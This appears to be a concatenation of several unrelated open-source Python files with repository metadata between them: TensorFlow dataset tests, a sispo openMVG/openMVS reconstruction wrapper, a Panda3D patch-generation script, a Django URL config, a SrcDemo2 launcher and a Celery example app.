                tensor_spec.TensorSpec([1], dtypes.string),
                tensor_spec.TensorSpec([], dtypes.string),
            )
        })

  @combinations.generate(test_base.default_test_combinations())
  def testDatasetDatasetSpec(self):
    """Dataset-valued elements produce a nested DatasetSpec structure."""
    self._testDatasetSpec(
        dataset_ops.Dataset.from_tensor_slices(
            constant_op.constant([1, 2, 3])),
        dataset_ops.DatasetSpec(tensor_spec.TensorSpec([], dtypes.int32)))

  @combinations.generate(test_base.default_test_combinations())
  def testOptionalDatasetSpec(self):
    """Optional-valued elements produce an OptionalSpec structure."""
    self._testDatasetSpec(
        optional_ops.Optional.from_value(37.0),
        optional_ops.OptionalSpec(tensor_spec.TensorSpec([], dtypes.float32)))
  @combinations.generate(test_base.graph_only_combinations())
  def testSameGraphError(self):
    """Transforming a dataset from a different graph must raise ValueError."""
    dataset = dataset_ops.Dataset.range(10)
    with ops.Graph().as_default():
      with self.assertRaisesRegex(ValueError, "must be from the same graph"):
        dataset = dataset.batch(2)

  @combinations.generate(
      combinations.combine(tf_api_version=[1], mode=["graph"]))
  def testSameGraphErrorOneShot(self):
    """One-shot iterator creation checks dataset/iterator graph identity."""
    dataset = dataset_ops.Dataset.range(10)
    with ops.Graph().as_default():
      with self.assertRaisesRegex(
          ValueError, "Please ensure that all datasets in the pipeline are "
          "created in the same graph as the iterator."):
        _ = dataset_ops.make_one_shot_iterator(dataset)

  @combinations.generate(
      combinations.combine(tf_api_version=[1], mode=["graph"]))
  def testSameGraphErrorInitializable(self):
    """Initializable iterator creation performs the same graph check."""
    dataset = dataset_ops.Dataset.range(10)
    with ops.Graph().as_default():
      with self.assertRaisesRegex(
          ValueError, "Please ensure that all datasets in the pipeline are "
          "created in the same graph as the iterator."):
        _ = dataset_ops.make_initializable_iterator(dataset)

  @combinations.generate(
      combinations.times(
          test_base.eager_only_combinations(),
          combinations.combine(execution_mode=[context.ASYNC, context.SYNC])))
  def testEagerIteration(self, execution_mode):
    """Datasets iterate in order under both sync and async eager execution."""
    with context.execution_mode(execution_mode):
      val = 0
      dataset = dataset_ops.Dataset.range(10)
      for foo in dataset:
        self.assertEqual(val, foo.numpy())
        val += 1

  @combinations.generate(test_base.default_test_combinations())
  def testDatasetAsFunctionArgument(self):
    """Datasets passed to tf.functions are traced structurally, not captured."""

    @def_function.function
    def _uses_dataset(d):
      accumulator = array_ops.zeros([], dtype=dtypes.int64)
      for value in d:
        accumulator += value
      return accumulator

    with ops.device("CPU"):
      first_dataset = dataset_ops.Dataset.range(10)
      self.assertEqual(45, self.evaluate(_uses_dataset(first_dataset)))
      second_dataset = dataset_ops.Dataset.range(11)
      self.assertEqual(55, self.evaluate(_uses_dataset(second_dataset)))
      first_concrete = _uses_dataset.get_concrete_function(first_dataset)
      # The dataset should not be a captured input
      self.assertEmpty(first_concrete.graph.captures)
      # The two datasets have the same structure and so should re-use a trace.
      self.assertIs(first_concrete,
                    _uses_dataset.get_concrete_function(second_dataset))
      # With a different structure we should use a different trace.
      self.assertIsNot(
          first_concrete,
          _uses_dataset.get_concrete_function(
              dataset_ops.Dataset.zip((first_dataset, second_dataset))))

  @combinations.generate(test_base.default_test_combinations())
  def testLimitedRetracing(self):
    """Structurally equal dataset arguments must not trigger retracing."""
    trace_count = [0]

    @def_function.function
    def f(ds):
      trace_count[0] += 1
      counter = np.int64(0)
      for elem in ds:
        counter += elem
      return counter

    dataset = dataset_ops.Dataset.range(5)
    dataset2 = dataset_ops.Dataset.range(10)

    for _ in range(10):
      self.assertEqual(self.evaluate(f(dataset)), 10)
      self.assertEqual(self.evaluate(f(dataset2)), 45)
      # One trace serves both datasets across all ten iterations.
      self.assertEqual(trace_count[0], 1)
  # pylint: disable=g-long-lambda,unnecessary-lambda
  @combinations.generate(test_base.default_test_combinations())
  def testLegacyStructureAPI(self):
    """Legacy output_types/output_shapes track correctly through transforms."""
    components = (np.array([1, 2, 3], dtype=np.int64), (np.array([4., 5.]),
                                                        np.array([6., 7.])),
                  np.array([8, 9, 10], dtype=np.int64))

    dataset = dataset_ops.Dataset.from_tensors(components)
    self.assertEqual(
        (dtypes.int64, (dtypes.float64, dtypes.float64), dtypes.int64),
        dataset_ops.get_legacy_output_types(dataset))
    self.assertEqual(([3], ([2], [2]), [3]),
                     dataset_ops.get_legacy_output_shapes(dataset))

    # shuffle/repeat/filter/take are element-wise: structure is unchanged.
    dataset = dataset.shuffle(10, 10)
    self.assertEqual(
        (dtypes.int64, (dtypes.float64, dtypes.float64), dtypes.int64),
        dataset_ops.get_legacy_output_types(dataset))
    self.assertEqual(([3], ([2], [2]), [3]),
                     dataset_ops.get_legacy_output_shapes(dataset))

    dataset = dataset.repeat(-1)
    self.assertEqual(
        (dtypes.int64, (dtypes.float64, dtypes.float64), dtypes.int64),
        dataset_ops.get_legacy_output_types(dataset))
    self.assertEqual(([3], ([2], [2]), [3]),
                     dataset_ops.get_legacy_output_shapes(dataset))

    dataset = dataset.filter(lambda x, y, z: True)
    self.assertEqual(
        (dtypes.int64, (dtypes.float64, dtypes.float64), dtypes.int64),
        dataset_ops.get_legacy_output_types(dataset))
    self.assertEqual(([3], ([2], [2]), [3]),
                     dataset_ops.get_legacy_output_shapes(dataset))

    dataset = dataset.take(5)
    self.assertEqual(
        (dtypes.int64, (dtypes.float64, dtypes.float64), dtypes.int64),
        dataset_ops.get_legacy_output_types(dataset))
    self.assertEqual(([3], ([2], [2]), [3]),
                     dataset_ops.get_legacy_output_shapes(dataset))

    # map/flat_map rearrange the element structure.
    dataset = dataset.map(lambda x, y, z: ((x, z), (y[0], y[1])))
    self.assertEqual(
        ((dtypes.int64, dtypes.int64), (dtypes.float64, dtypes.float64)),
        dataset_ops.get_legacy_output_types(dataset))
    self.assertEqual((([3], [3]), ([2], [2])),
                     dataset_ops.get_legacy_output_shapes(dataset))

    dataset = dataset.flat_map(lambda x, y: dataset_ops.Dataset.from_tensors(
        ((x[0], x[1]), (y[0], y[1]))))
    self.assertEqual(
        ((dtypes.int64, dtypes.int64), (dtypes.float64, dtypes.float64)),
        dataset_ops.get_legacy_output_types(dataset))
    self.assertEqual((([3], [3]), ([2], [2])),
                     dataset_ops.get_legacy_output_shapes(dataset))

    # batch() prepends an unknown batch dimension to every component.
    dataset = dataset.batch(32)
    self.assertEqual(
        ((dtypes.int64, dtypes.int64), (dtypes.float64, dtypes.float64)),
        dataset_ops.get_legacy_output_types(dataset))
    dataset_output_shapes = dataset_ops.get_legacy_output_shapes(dataset)
    self.assertEqual(
        (([None, 3], [None, 3]), ([None, 2], [None, 2])),
        nest.pack_sequence_as(
            dataset_output_shapes,
            [s.as_list() for s in nest.flatten(dataset_output_shapes)]))

    # Define a separate set of components with matching leading
    # dimension for the from-slices constructor.
    components_for_slices = (np.array([1, 2, 3],
                                      dtype=np.int64), (np.array([4., 5., 6.]),
                                                        np.array([7., 8., 9.])),
                             np.array([10, 11, 12], dtype=np.int64))

    dataset = dataset_ops.Dataset.from_tensor_slices(components_for_slices)
    self.assertEqual(
        (dtypes.int64, (dtypes.float64, dtypes.float64), dtypes.int64),
        dataset_ops.get_legacy_output_types(dataset))
    self.assertEqual(([], ([], []), []),
                     dataset_ops.get_legacy_output_shapes(dataset))
  @combinations.generate(test_base.default_test_combinations())
  def testNoneComponent(self):
    """Elements may contain a literal None component."""
    dataset = dataset_ops.Dataset.from_tensors((42, None))
    if context.executing_eagerly():
      self.assertDatasetProduces(dataset, expected_output=[(42, None)])
    else:
      iterator = dataset_ops.make_one_shot_iterator(dataset)
      next_first, next_second = iterator.get_next()
      self.assertEqual(next_second, None)
      with self.cached_session() as sess:
        self.assertEqual(sess.run(next_first), 42)

  @combinations.generate(test_base.default_test_combinations())
  def testNoneComponentInFunction(self):
    """None components pass through tf.function iteration unchanged."""

    @def_function.function
    def fn(ds):
      total = 0
      it = iter(ds)
      for elem in it:
        x, _ = elem
        total += x
      return total

    dataset = dataset_ops.Dataset.range(
        10, output_type=dtypes.int32).map(lambda x: (x, None))
    self.assertEqual(self.evaluate(fn(dataset)), 45)

  @combinations.generate(test_base.default_test_combinations())
  def testIncorrectPythonStructure(self):
    # Tests that an exception is raised (as opposed to a segfault) when the
    # Python structure assigned to a dataset is incorrect.
    dataset = dataset_ops.Dataset.range(10)
    spec = tensor_spec.TensorSpec([], dtypes.int64)
    new_structure = (spec, spec)
    dataset = dataset_ops._RestructuredDataset(dataset, new_structure)
    dataset = dataset.map(lambda x, y: y)

    with self.assertRaisesOpError(""):
      self.getDatasetOutput(dataset)

  @combinations.generate(test_base.default_test_combinations())
  def testNamedTupleStructure(self):
    """element_spec preserves namedtuple field structure in its repr."""
    Foo = collections.namedtuple("Foo", ["a", "b"])
    x = Foo(a=3, b="test")
    dataset = dataset_ops.Dataset.from_tensors(x)
    dataset = dataset_ops.Dataset.from_tensor_slices([dataset, dataset])
    self.assertEqual(
        str(dataset.element_spec),
        "DatasetSpec(Foo(a=TensorSpec(shape=(), dtype=tf.int32, name=None), "
        "b=TensorSpec(shape=(), dtype=tf.string, name=None)), TensorShape([]))")

  @combinations.generate(test_base.eager_only_combinations())
  def testDebugModeEagerExecution(self):
    """In debug mode, map functions run eagerly (plus one tracing call)."""
    dataset_ops.toggle_debug_mode(True)

    counter = []
    ds = dataset_ops.Dataset.range(10)

    def map_fn(x):
      counter.append(1)
      return x

    ds = ds.map(map_fn)
    self.assertDatasetProduces(ds, list(range(10)))

    # The body of `map_fn` will be executed 11 times since the implementation
    # traces the function to figure out what the types and shapes of its
    # outputs are.
    self.assertLen(counter, 11)
    dataset_ops.toggle_debug_mode(False)

  @combinations.generate(test_base.eager_only_combinations())
  def testDebugModeSequentialExecution(self):
    """Debug mode rewrites parallel/prefetch ops into sequential ones."""
    dataset_ops.toggle_debug_mode(True)

    ds = dataset_ops.Dataset.range(10)
    # assert_next verifies the rewritten (sequential) op sequence.
    ds = ds.apply(
        testing.assert_next(["Interleave", "Map", "Batch", "FiniteTake"]))
    ds = ds.interleave(
        lambda x: dataset_ops.Dataset.from_tensors(x),
        cycle_length=10,
        num_parallel_calls=10)
    ds = ds.map(lambda x: x * x, num_parallel_calls=10)
    ds = ds.batch(batch_size=5, num_parallel_calls=2)
    ds = ds.prefetch(buffer_size=2)
    ds = ds.take(2)
    self.assertDatasetProduces(ds, [[0, 1, 4, 9, 16], [25, 36, 49, 64, 81]])
    dataset_ops.toggle_debug_mode(False)


if __name__ == "__main__":
  test.main()
| 40.127132
| 80
| 0.708021
|
4a0f1fa5e1a100700f33f4591394ab80c0fe9bc2
| 15,517
|
py
|
Python
|
sispo/reconstruction/reconstruction.py
|
oknuutti/sispo
|
c54019fca4e941a83cc78eda1356b8441bd04d17
|
[
"BSD-2-Clause"
] | null | null | null |
sispo/reconstruction/reconstruction.py
|
oknuutti/sispo
|
c54019fca4e941a83cc78eda1356b8441bd04d17
|
[
"BSD-2-Clause"
] | null | null | null |
sispo/reconstruction/reconstruction.py
|
oknuutti/sispo
|
c54019fca4e941a83cc78eda1356b8441bd04d17
|
[
"BSD-2-Clause"
] | null | null | null |
"""
Reconstruction module to create 3D models from images.
Currently this module uses openMVG and openMVS.
"""
from datetime import datetime
import logging
from pathlib import Path
from . import openmvg
from . import openmvs
class Reconstructor():
"""Reconstruction of a 3D object from images."""
    def __init__(self,
                 res_dir,
                 focal=65437,
                 intrinsics=None,
                 cam_model=1,
                 use_prior=True,
                 prior_weights=(1.0,1.0,1.0),
                 force_compute=False,
                 descriptor="SIFT",
                 d_preset="ULTRA",
                 use_upright=True,
                 num_threads=0,
                 neighbour_ratio=0.8,
                 geo_model="f",
                 num_overlaps=3,
                 pairlist_file=None,
                 method="FASTCASCADEHASHINGL2",
                 guided=False,
                 cache_size=None,
                 first_img=None,
                 second_img=None,
                 refine_options="ADJUST_ALL",
                 match_file=None,
                 p_prio=-1,
                 res_lvl=1,
                 res_min=640,
                 num_views=0,
                 num_views_fuse=3,
                 est_colors=False,
                 est_normals=False,
                 sample_mesh=0,
                 const_weight=1,
                 free_space=0,
                 thickness=1,
                 quality=1,
                 decimate=1,
                 remove_spurious=30,
                 remove_spikes=True,
                 close_holes=30,
                 smooth=2,
                 max_views=8,
                 ensure_edge_size=1,
                 max_face_area=64,
                 scales=3,
                 scale_step=0.5,
                 reduce_memory=True,
                 alt_pair=0,
                 reg_weight=0.2,
                 rig_ela_ratio=0.9,
                 grad_step=45.05,
                 vertex_ratio=0,
                 use_cuda=False,
                 export_type="obj",
                 outlier_thres=0.6,
                 cost_smooth_ratio=0.1,
                 seam_level_global=1,
                 seam_level_local=1,
                 texture_size_multiple=0,
                 patch_heuristic=3,
                 empty_color=16744231,
                 orthographic_res=0,
                 openMVG_dir=None,
                 openMVS_dir=None,
                 ext_logger=None):
        """Initialises main directory and file structure.

        Creates the openMVG and openMVS controllers and stores every
        pipeline parameter on the instance so the individual pipeline
        methods can forward them to the external tools.  ``openMVG_dir``
        and ``openMVS_dir`` are validated and silently reset to ``None``
        (the controllers' defaults) when they are not existing
        directories.  If ``ext_logger`` is ``None`` a local file logger
        is created instead.
        """
        # Use the caller-provided logger if available, otherwise set up a
        # dedicated file logger for this reconstruction run.
        if ext_logger is not None:
            self.logger = ext_logger
        else:
            self.logger = self._create_logger()

        self.res_dir = res_dir

        # Validate the optional openMVG install directory before handing it
        # to the controller; an invalid path falls back to the default.
        if openMVG_dir is not None:
            openMVG_dir = Path(openMVG_dir).resolve()
            if not openMVG_dir.is_dir():
                openMVG_dir = None
        else:
            openMVG_dir = None
        self.oMVG = openmvg.OpenMVGController(self.res_dir,
                                              ext_logger=self.logger,
                                              openMVG_dir=openMVG_dir)

        # Same validation for the optional openMVS install directory.
        if openMVS_dir is not None:
            openMVS_dir = Path(openMVS_dir).resolve()
            if not openMVS_dir.is_dir():
                openMVS_dir = None
        else:
            openMVS_dir = None
        self.oMVS = openmvs.OpenMVSController(self.res_dir,
                                              ext_logger=self.logger,
                                              openMVS_dir=openMVS_dir)

        # --- openMVG image analysis / feature parameters -----------------
        self.focal = focal
        self.intrinsics = intrinsics
        self.cam_model = cam_model
        self.use_prior = use_prior
        self.prior_weights = prior_weights
        self.force_compute = force_compute
        self.descriptor = descriptor
        self.d_preset = d_preset
        self.use_upright = use_upright
        self.num_threads = num_threads
        # --- openMVG matching / reconstruction parameters ----------------
        self.neighbour_ratio = neighbour_ratio
        self.geo_model = geo_model
        self.num_overlaps = num_overlaps
        self.pairlist_file = pairlist_file
        self.method = method
        self.guided = guided
        self.cache_size = cache_size
        self.first_img = first_img
        self.second_img = second_img
        self.refine_options = refine_options
        self.match_file = match_file
        # --- openMVS densify parameters ----------------------------------
        self.p_prio = p_prio
        self.res_lvl = res_lvl
        self.res_min = res_min
        self.num_views = num_views
        self.num_views_fuse = num_views_fuse
        self.est_colors = est_colors
        self.est_normals = est_normals
        self.sample_mesh = sample_mesh
        # --- openMVS mesh creation / refinement parameters ---------------
        self.const_weight = const_weight
        self.free_space = free_space
        self.thickness = thickness
        self.quality = quality
        self.decimate = decimate
        self.remove_spurious = remove_spurious
        self.remove_spikes = remove_spikes
        self.close_holes = close_holes
        self.smooth = smooth
        self.max_views = max_views
        self.ensure_edge_size = ensure_edge_size
        self.max_face_area = max_face_area
        self.scales = scales
        self.scale_step = scale_step
        self.reduce_memory = reduce_memory
        self.alt_pair = alt_pair
        self.reg_weight = reg_weight
        self.rig_ela_ratio = rig_ela_ratio
        self.grad_step = grad_step
        self.vertex_ratio = vertex_ratio
        self.use_cuda = use_cuda
        # --- openMVS texturing parameters --------------------------------
        self.export_type = export_type
        self.outlier_thres = outlier_thres
        self.cost_smooth_ratio = cost_smooth_ratio
        self.seam_level_global = seam_level_global
        self.seam_level_local = seam_level_local
        self.texture_size_multiple = texture_size_multiple
        self.patch_heuristic = patch_heuristic
        self.empty_color = empty_color
        self.orthographic_res = orthographic_res
    def create_pointcloud(self):
        """Creates point cloud from images.

        Runs the four openMVG stages in order: image analysis, feature
        extraction, feature matching, and incremental reconstruction.
        """
        self.oMVG.analyse_images(self.focal,
                                 self.intrinsics,
                                 self.cam_model,
                                 self.use_prior,
                                 self.prior_weights)
        self.oMVG.compute_features(self.force_compute,
                                   self.descriptor,
                                   self.d_preset,
                                   self.use_upright,
                                   self.num_threads)
        self.oMVG.match_features(self.force_compute,
                                 self.neighbour_ratio,
                                 self.geo_model,
                                 self.num_overlaps,
                                 self.pairlist_file,
                                 self.method,
                                 self.guided,
                                 self.cache_size)
        self.oMVG.reconstruct_multi(self.first_img,
                                    self.second_img,
                                    self.cam_model,
                                    self.refine_options,
                                    self.use_prior,
                                    self.match_file)
    def densify_pointcloud(self):
        """Create a dense point cloud from images and point cloud.

        Exports the sparse openMVG scene to openMVS format first, then runs
        the openMVS densification step.
        """
        self.oMVG.export_MVS(self.num_threads)

        self.oMVS.densify_pointcloud(self.p_prio,
                                     self.num_threads,
                                     self.res_lvl,
                                     self.res_min,
                                     self.num_views,
                                     self.num_views_fuse,
                                     self.est_colors,
                                     self.est_normals,
                                     self.sample_mesh)
    def create_textured_model(self):
        """Creates mesh, refines it and applies texture to it.

        Runs the three openMVS surface stages in order: mesh creation,
        mesh refinement, and mesh texturing.
        """
        self.oMVS.create_mesh(self.export_type,
                              self.p_prio,
                              self.num_threads,
                              self.const_weight,
                              self.free_space,
                              self.thickness,
                              self.quality,
                              self.decimate,
                              self.remove_spurious,
                              self.remove_spikes,
                              self.close_holes,
                              self.smooth)
        self.oMVS.refine_mesh(self.export_type,
                              self.p_prio,
                              self.num_threads,
                              self.res_lvl,
                              self.res_min,
                              self.max_views,
                              self.decimate,
                              self.close_holes,
                              self.ensure_edge_size,
                              self.max_face_area,
                              self.scales,
                              self.scale_step,
                              self.reduce_memory,
                              self.alt_pair,
                              self.reg_weight,
                              self.rig_ela_ratio,
                              self.grad_step,
                              self.vertex_ratio,
                              self.use_cuda)
        self.oMVS.texture_mesh(self.export_type,
                               self.p_prio,
                               self.num_threads,
                               self.res_lvl,
                               self.res_min,
                               self.outlier_thres,
                               self.cost_smooth_ratio,
                               self.seam_level_global,
                               self.seam_level_local,
                               self.texture_size_multiple,
                               self.patch_heuristic,
                               self.empty_color,
                               self.orthographic_res)
def create_export_pointcloud(self):
"""Creates and exports pointcloud to openMVS format.
Includes all reconstruction steps of the openMVG tool.
"""
self.oMVG.analyse_images(self.focal,
self.intrinsics,
self.cam_model,
self.prior,
self.prior_weights)
self.oMVG.compute_features(self.force_compute,
self.descriptor,
self.d_preset,
self.use_upright,
self.num_threads)
self.oMVG.match_features(self.force_compute,
self.neighbour_ratio,
self.geo_model,
self.num_overlaps,
self.pairlist_file,
self.method,
self.guided,
self.cache_size)
self.oMVG.reconstruct_multi(self.first_img,
self.second_img,
self.cam_model,
self.refine_options,
self.use_prior,
self.match_file)
self.oMVG.export_MVS(self.num_threads)
def densify_mesh_texture_model(self):
"""Densifies pointcloud, creates and refines mesh and testures it.
Includes all reconstruction steps of the openMVS tool.
"""
self.oMVS.densify_pointcloud(self.p_prio,
self.num_threads,
self.res_lvl,
self.res_min,
self.num_views,
self.num_views_fuse,
self.est_colors,
self.est_normals,
self.sample_mesh)
self.oMVS.create_mesh(self.export_type,
self.p_prio,
self.num_threads,
self.const_weight,
self.free_space,
self.thickness,
self.quality,
self.decimate,
self.remove_spurious,
self.remove_spikes,
self.holes,
self.smooth)
self.oMVS.refine_mesh(self.export_type,
self.p_prio,
self.num_threads,
self.res_lvl,
self.res_min,
self.max_views,
self.decimate,
self.holes,
self.ensure_edge_size,
self.max_face_area,
self.scales,
self.scale_step,
self.reduce_memory,
self.alt_pair,
self.reg_weight,
self.rig_ela_ratio,
self.grad_step,
self.vertex_ratio,
self.use_cuda)
self.oMVS.texture_mesh(self.export_type,
self.p_prio,
self.num_threads,
self.res_lvl,
self.res_min,
self.outlier_thres,
self.cost_smooth_ratio,
self.seam_level_global,
self.seam_level_local,
self.texture_size_multiple,
self.patch_heuristic,
self.empty_color,
self.orthographic_res)
    def reconstruct(self):
        """
        Applies entire reconstruction pipeline

        Going from images over dense point cloud to textured mesh model.
        """
        # Sparse openMVG reconstruction, openMVS densification, then
        # mesh creation/refinement/texturing.
        self.create_pointcloud()
        self.densify_pointcloud()
        self.create_textured_model()
@staticmethod
def _create_logger():
"""
Creates local logger in case no external logger was provided.
"""
now = datetime.now().strftime("%Y-%m-%dT%H%M%S%z")
filename = (now + "_reconstruction.log")
log_dir = Path(__file__).resolve().parent.parent.parent
log_dir = log_dir / "data" / "logs"
if not log_dir.is_dir:
Path.mkdir(log_dir)
log_file = log_dir / filename
logger = logging.getLogger("reconstruction")
logger.setLevel(logging.DEBUG)
logger_formatter = logging.Formatter(
"%(asctime)s - %(name)s - %(funcName)s - %(message)s")
file_handler = logging.FileHandler(str(log_file))
file_handler.setLevel(logging.DEBUG)
file_handler.setFormatter(logger_formatter)
logger.addHandler(file_handler)
logger.debug("\n\n############ NEW RECONSTRUCTION LOG ############\n")
return logger
if __name__ == "__main__":
pass
| 40.199482
| 78
| 0.451311
|
4a0f1faf73a5ee0b459b8a9123e7299c462af03f
| 3,167
|
py
|
Python
|
dev/tools/leveleditor/direct/p3d/ppatcher.py
|
CrankySupertoon01/Toontown-2
|
60893d104528a8e7eb4aced5d0015f22e203466d
|
[
"MIT"
] | 1
|
2021-02-13T22:40:50.000Z
|
2021-02-13T22:40:50.000Z
|
dev/tools/leveleditor/direct/p3d/ppatcher.py
|
CrankySupertoonArchive/Toontown-2
|
60893d104528a8e7eb4aced5d0015f22e203466d
|
[
"MIT"
] | 1
|
2018-07-28T20:07:04.000Z
|
2018-07-30T18:28:34.000Z
|
dev/tools/leveleditor/direct/p3d/ppatcher.py
|
CrankySupertoonArchive/Toontown-2
|
60893d104528a8e7eb4aced5d0015f22e203466d
|
[
"MIT"
] | 2
|
2019-12-02T01:39:10.000Z
|
2021-02-13T22:41:00.000Z
|
#! /usr/bin/env python
usageText = """
This script generates the patches required to support incremental
download of Panda3D packages. It can be run as a post-process on a
directory hierarchy created by ppackage; it will examine the directory
hierarchy, and create any patches that appear to be missing.
You may run ppackage on the same directory hierarchy as many times as
you like, without creating patches. You may then download and test
the resulting files--users connecting to the tree without fresh
patches will be forced to download the entire file, instead of making
an incremental download, but the entire process will work otherwise.
When you are satisfied that all of the files are ready to be released,
you may run ppackage on the directory hierarchy to generate the
required patches.
Generating the patches just before final release is a good idea to
limit the number of trivially small patches that are created. Each
time this script is run, a patch is created from the previous version,
and these patches daisy-chain together to define a complete update
sequence. If you run this script on internal releases, you will
generate a long chain of small patches that your users must download;
this is pointless if there is no possibility of anyone having
downloaded one of the intervening versions.
You can also generate patches with the -p option to ppackage, but that
only generates patches for the specific packages built by that
invocation of ppackage. If you use the ppatcher script instead, it
will generate patches for all packages (or the set of packages that
you name specifically).
This script is actually a wrapper around Panda's PatchMaker.py.
Usage:
%(prog)s [opts] [packageName1 .. packageNameN]
Parameters:
packageName1 .. packageNameN
Specify the names of the package(s) you wish to generate patches
for. This allows you to build patches for only a subset of the
packages found in the tree. If you omit these parameters, patches
are built for all packages that require them.
Options:
-i install_dir
The full path to the install directory. This should be the same
directory named by the -i parameter to ppackage.
-h
Display this help
"""
import sys
import getopt
import os
from direct.p3d.PatchMaker import PatchMaker
from pandac.PandaModules import *
def usage(code, msg = ''):
    # Print the usage text plus an optional error message and exit with the
    # given status code.  NOTE: this tool targets the Python 2 runtime
    # shipped with Panda3D (print-statement syntax below).
    print >> sys.stderr, usageText % {'prog' : os.path.split(sys.argv[0])[1]}
    print >> sys.stderr, msg
    sys.exit(code)
# Parse command-line options (Python 2 getopt idiom: -i <dir>, -h).
try:
    opts, args = getopt.getopt(sys.argv[1:], 'i:h')
except getopt.error, msg:
    usage(1, msg)

installDir = None
for opt, arg in opts:
    if opt == '-i':
        # Install directory previously produced by ppackage.
        installDir = Filename.fromOsSpecific(arg)
    elif opt == '-h':
        usage(0)
    else:
        print 'illegal option: ' + arg
        sys.exit(1)

packageNames = args

if not installDir:
    # Default matches ppackage's default output directory.
    installDir = Filename('install')

if not packageNames:
    # "None" means all packages.
    packageNames = None

# Build any missing patches across the install tree.
pm = PatchMaker(installDir)
pm.buildPatches(packageNames = packageNames)

# An explicit call to exit() is required to exit the program, when
# this module is packaged in a p3d file.
sys.exit(0)
| 31.356436
| 77
| 0.7455
|
4a0f2017bc030676028a0e9dc220b799e40e3c24
| 1,409
|
py
|
Python
|
gcloud/contrib/appmaker/urls.py
|
SHUN-YI/bk-sops
|
a4a841bdc44a18518c6c53c04a02996ddc7da2be
|
[
"Apache-2.0"
] | 2
|
2019-08-15T10:06:26.000Z
|
2019-09-17T11:49:20.000Z
|
gcloud/contrib/appmaker/urls.py
|
SHUN-YI/bk-sops
|
a4a841bdc44a18518c6c53c04a02996ddc7da2be
|
[
"Apache-2.0"
] | null | null | null |
gcloud/contrib/appmaker/urls.py
|
SHUN-YI/bk-sops
|
a4a841bdc44a18518c6c53c04a02996ddc7da2be
|
[
"Apache-2.0"
] | 1
|
2020-07-03T06:45:07.000Z
|
2020-07-03T06:45:07.000Z
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community Edition) available.
Copyright (C) 2017-2019 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
""" # noqa
from django.conf.urls import url
from gcloud.contrib.appmaker import views, api
urlpatterns = [
    # Create or edit a lightweight app ("appmaker").
    url(r'^save/(?P<biz_cc_id>\d+)/$', api.save),

    # Links used inside a mini-app.
    # Open a lightweight app and jump straight to the parameter-filling step.
    url(r'^(?P<app_id>\d+)/newtask/(?P<biz_cc_id>\d+)/selectnode/$', views.newtask_selectnode),
    url(r'^(?P<app_id>\d+)/newtask/(?P<biz_cc_id>\d+)/paramfill/$', views.newtask_paramfill),
    # Jump from a lightweight app's task record to the task detail page.
    url(r'^(?P<app_id>\d+)/execute/(?P<biz_cc_id>\d+)/$', views.execute),
    # Task list inside a lightweight app.
    url(r'^(?P<app_id>\d+)/task_home/(?P<biz_cc_id>\d+)/$', views.task_home),
    url(r'^get_appmaker_count/(?P<biz_cc_id>\d+)/$', api.get_appmaker_count),
]
| 48.586207
| 305
| 0.715401
|
4a0f20414cd8cd57f9d96dc89344cbb46591288d
| 273
|
py
|
Python
|
launcher/SrcDemo2-debug.py
|
TiagoFilippi/srcdemo2
|
53bf581bc6fd8efc7b8f9c22b9278a682fdf5365
|
[
"BSD-2-Clause"
] | 17
|
2015-07-13T14:36:29.000Z
|
2021-03-18T00:56:04.000Z
|
launcher/SrcDemo2-debug.py
|
TiagoFilippi/srcdemo2
|
53bf581bc6fd8efc7b8f9c22b9278a682fdf5365
|
[
"BSD-2-Clause"
] | 3
|
2015-04-21T23:23:44.000Z
|
2017-03-19T16:49:39.000Z
|
launcher/SrcDemo2-debug.py
|
TiagoFilippi/srcdemo2
|
53bf581bc6fd8efc7b8f9c22b9278a682fdf5365
|
[
"BSD-2-Clause"
] | 8
|
2015-07-13T13:37:52.000Z
|
2020-09-18T01:16:48.000Z
|
import traceback

# Debug launcher: run SrcDemo2 with debug output enabled and keep the
# console window open on failure so the traceback stays visible.
# NOTE: targets Python 2 (raw_input below).
try:
    import SrcDemo2Launcher
    # True enables the launcher's debug mode.
    SrcDemo2Launcher.launch(True)
except:
    traceback.print_exc()
    try:
        from SrcDemo2Launcher import is_windows
        if is_windows():
            # Windows consoles close immediately; wait for the user.
            raw_input('Press Enter to close this window...')
    except:
        raw_input('Press Enter to continue.')
| 18.2
| 50
| 0.776557
|
4a0f2077a96067016076159817dd5e8a7d7cd598
| 817
|
py
|
Python
|
desktop/core/ext-py/celery-4.2.1/examples/app/myapp.py
|
maulikjs/hue
|
59ac879b55bb6fb26ecb4e85f4c70836fc21173f
|
[
"Apache-2.0"
] | 5,079
|
2015-01-01T03:39:46.000Z
|
2022-03-31T07:38:22.000Z
|
desktop/core/ext-py/celery-4.2.1/examples/app/myapp.py
|
zks888/hue
|
93a8c370713e70b216c428caa2f75185ef809deb
|
[
"Apache-2.0"
] | 1,623
|
2015-01-01T08:06:24.000Z
|
2022-03-30T19:48:52.000Z
|
desktop/core/ext-py/celery-4.2.1/examples/app/myapp.py
|
zks888/hue
|
93a8c370713e70b216c428caa2f75185ef809deb
|
[
"Apache-2.0"
] | 2,033
|
2015-01-04T07:18:02.000Z
|
2022-03-28T19:55:47.000Z
|
"""myapp.py
Usage::
(window1)$ python myapp.py worker -l info
(window2)$ python
>>> from myapp import add
>>> add.delay(16, 16).get()
32
You can also specify the app to use with the `celery` command,
using the `-A` / `--app` option::
$ celery -A myapp worker -l info
With the `-A myproj` argument the program will search for an app
instance in the module ``myproj``. You can also specify an explicit
name using the fully qualified form::
$ celery -A myapp:app worker -l info
"""
from __future__ import absolute_import, unicode_literals
from celery import Celery
# Celery application instance; the module name ('myapp') is what the
# `celery -A myapp worker` invocation resolves.
app = Celery(
    'myapp',
    # Broker URL: assumes a local RabbitMQ with the default guest account.
    broker='amqp://guest@localhost//',
    # ## add result backend here if needed.
    # backend='rpc'
)


@app.task
def add(x, y):
    """Return the sum of x and y (demo task)."""
    return x + y

if __name__ == '__main__':
    # Running the module directly hands control to Celery's CLI.
    app.start()
| 19
| 68
| 0.656059
|
4a0f2077db7d23cf2ee18132f53da6530d07623a
| 23,927
|
py
|
Python
|
cupcake/tofu/counting/combine_abundance_across_samples.py
|
